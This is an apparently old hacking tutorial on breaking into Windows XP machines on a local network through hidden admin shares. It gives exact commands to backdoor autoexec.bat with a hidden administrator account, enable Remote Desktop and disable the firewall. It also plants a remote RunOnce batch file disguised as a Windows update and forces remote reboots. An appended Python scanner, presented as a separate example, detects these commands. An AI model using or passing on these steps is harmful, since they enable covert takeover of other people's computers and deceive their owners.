So you want a quick and easy way to hack a Windows machine on a network you're on? This attack is pretty easy, and works pretty frequently. It involves connecting to a hidden share, uploading a logic bomb, and voila, instant access. The first thing to know is that Windows XP makes file sharing pretty easy. You can just right-click on a folder or drive, go to Sharing, and set it up. However, what a lot of people don't know is that Windows installs come with secret shares that are used by applications and Windows networking. The default secret shares are:
IPC$
Admin$
and some have a
C$
The dollar sign after the name, as you may have guessed, means the share is secret: it does not show up in normal Windows browsing. The IPC$ share isn't of much interest to us right now; it is used for things beyond file sharing. Try it quickly: go to the Run box in the Start menu and type in
\\IP\admin$
\\IP\C$
Just replace IP with the IP address of some computer on your network. There is a good chance you'll be able to access files. If you can access C$, that's awesome; if not, there is a workaround I'll cover later. If you can access C$, keep reading; if you cannot, skip to the bottom section and read that.

I Can Access the C$ Share
------------------------------------------------------------------------

Okay, so you are able to access the C$ share. Then this is a piece of cake. First you need to create a batch file. A batch file is just a series of DOS commands saved in a file that Windows can run. To make one you just open Notepad, start typing commands, and save it as a .bat file. Good news: you don't even need to write a new batch file for this, you can just edit one that already exists, called autoexec.bat. This is a file that runs every time Windows starts up. Normally it is empty, but we are going to add a few lines to it. Autoexec.bat is what is called super hidden, meaning it has both the Windows system attribute and the Windows hidden attribute set. So, to see the file, open any folder at all, go to the Tools menu, then Folder Options. Click the View tab and scroll down until you find the option
Hide protected operating system files (recommended)
Make sure to uncheck that. Now you should be able to see autoexec.bat. To open it, just right-click on it and click Edit. Add the following lines to it.

net user MS_Server_Consol MSServer01 /add
net group administrators MS_Server_Consol /add
reg ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SpecialAccounts\UserList" /v MS_Server_Consol /t REG_DWORD /d 0 /f
reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode mode=DISABLE

Then save it and wait for that computer to be restarted, or if you have the ability, restart it yourself. What those commands do is create an account called MS_Server_Consol with a password of MSServer01, make it an administrator, hide that account from the user login list so nobody gets suspicious, turn on Remote Desktop so we can take total control of the machine later, and turn off the Windows Firewall so Remote Desktop will work without having to worry about the firewall being on.
Once the machine is restarted, you basically own the box. You have a local admin account with Remote Desktop on, and nobody should be the wiser. I would then remove the lines from autoexec.bat now that the damage is done. There are a few cases in which this will not work:
- If the C$ is not shared
- If you are on a Windows Domain
- If another firewall is blocking your editing of autoexec.bat
- If there is other security in place blocking our attempts.

Although it may seem like this approach would fail a lot, it actually succeeds more often than it fails. Also, the person may have outright shared their C drive, in which case you don't need the secret share, so you can try that too.

I Can't Access the C$ Share
------------------------------------------------------------------------

So what if the C drive is not shared? Don't worry, we have another trick up our sleeve. This one gets a little more complex and deals with some remote registry hacks, so unless you are experienced, don't try this one. Our outline of attack is as follows.

- Write a registry key under the remote machine's startup (RunOnce) key that will run a custom-made bat file.
- Write a bat file that shares the C drive.
- Upload the bat file to the admin share of the remote machine.
- Wait for, or force, the remote machine to restart.
Okay, so step 1: we need to write a registry key to the remote computer that will run a bat file of our choosing. The basic outline of the command is this.

reg add "[IP]\HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE" /v Runbat /t REG_SZ /d C:\WINDOWS\ShareC.bat

This command all goes on one line at a DOS prompt. Replace [IP] with the name or IP address of the victim machine. Hopefully the command runs; if not, you are shit out of luck (at least for this article; there are a few other ways, I think, but none I feel like covering here). Okay, now we write a batch file that has the following lines.

@echo off
net Share c$=c:

Save that as ShareC.bat and write it to the root of the admin$ share on the remote machine. Once again, we need to wait for the machine to be rebooted somehow. This should share the C drive as C$, and you can then follow the steps above. Keep in mind this may raise some suspicion, because a DOS box is going to pop up the next time the person uses the computer; hopefully they just write it off as something odd. You could also add a line like:

ECHO Updating Windows...

to the end of the above batch file. That will display the text "Updating Windows..." to the person in the DOS prompt, so hopefully they just ignore it. Now the C drive is shared and you can follow the directions for the C$ share. Keep in mind this is just a basic walkthrough; you may have to adjust your attack some to make it work in the current network environment, but it should work for a lot of home networks and some small business networks.

Oh, also, one command you can try to force the remote machine to shut down and restart is

shutdown -r -m \\IP -t 1

With any luck, that will force the remote machine to restart right now! Make sure nobody is logged on. The last number adjusts the number of seconds until shutdown. So give that a whirl. Good luck, remember to think things through if things aren't working, and use your own knowledge to adapt the attack as needed.
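The detection-side counterpart to both sections above, added here as an example and not part of the original article: a small scanner that flags the tell-tale lines (hidden admin account, SpecialAccounts\UserList entry, fDenyTSConnections = 0, firewall off, RunOnce pointing at a .bat, a re-created C$ share) in a startup batch file collected from a machine. The sample file and the HOST-PLACEHOLDER name are constructed for the example.

```python
import re

# Constructed sample of a startup batch file tampered the way the article
# describes; not captured from a real machine. HOST-PLACEHOLDER is not a real name.
SAMPLE_AUTOEXEC = """\
@echo off
net user MS_Server_Consol MSServer01 /add
net group administrators MS_Server_Consol /add
reg ADD "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SpecialAccounts\\UserList" /v MS_Server_Consol /t REG_DWORD /d 0 /f
reg ADD "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall set opmode mode=DISABLE
reg add "\\\\HOST-PLACEHOLDER\\HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" /v Runbat /t REG_SZ /d C:\\WINDOWS\\ShareC.bat
net Share c$=c:
ECHO Updating Windows...
"""

# (label, case-insensitive regex); group 1 captures the account, value or share.
RULES = [
    ("local account created", r"^net\s+user\s+(\S+)\s+\S+\s+/add\b"),
    ("account added to Administrators",
     r"^net\s+(?:local)?group\s+administrators\s+(\S+)\s+/add\b"),
    ("account hidden from logon screen (SpecialAccounts\\UserList = 0)",
     r"^reg\s+add\s+\".*specialaccounts\\userlist\"\s+/v\s+(\S+)\s+/t\s+reg_dword\s+/d\s+0\b"),
    ("Remote Desktop enabled (fDenyTSConnections = 0)",
     r"^reg\s+add\s+\".*terminal server\"\s+/v\s+(fDenyTSConnections)\s+/t\s+reg_dword\s+/d\s+0\b"),
    ("Windows Firewall disabled", r"^netsh\s+firewall\s+set\s+opmode\s+(mode=disable)\b"),
    ("RunOnce entry launching a batch file",
     r"^reg\s+add\s+\"?.*\\runonce\"?\s+/v\s+(\S+)\s+/t\s+reg_sz\s+/d\s+\S+\.bat\b"),
    ("administrative share (re)created", r"^net\s+share\s+(\w+\$)=\S+"),
]

def scan_batch(text):
    """Return [(line_no, label, captured)] for every line that matches a rule."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RULES:
            m = re.match(pattern, line.strip(), re.IGNORECASE)
            if m:
                findings.append((no, label, m.group(1)))
    return findings

def hidden_admin_accounts(findings):
    """Accounts both added to Administrators and hidden from the logon list."""
    admins = {n for _, label, n in findings if label.startswith("account added")}
    hidden = {n for _, label, n in findings if label.startswith("account hidden")}
    return sorted(admins & hidden)
```

Run scan_batch over the text of autoexec.bat (or any startup script) pulled from a suspect machine; a net user/net group pair combined with a SpecialAccounts\UserList entry for the same name is the signature of the hidden administrator the first section creates.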
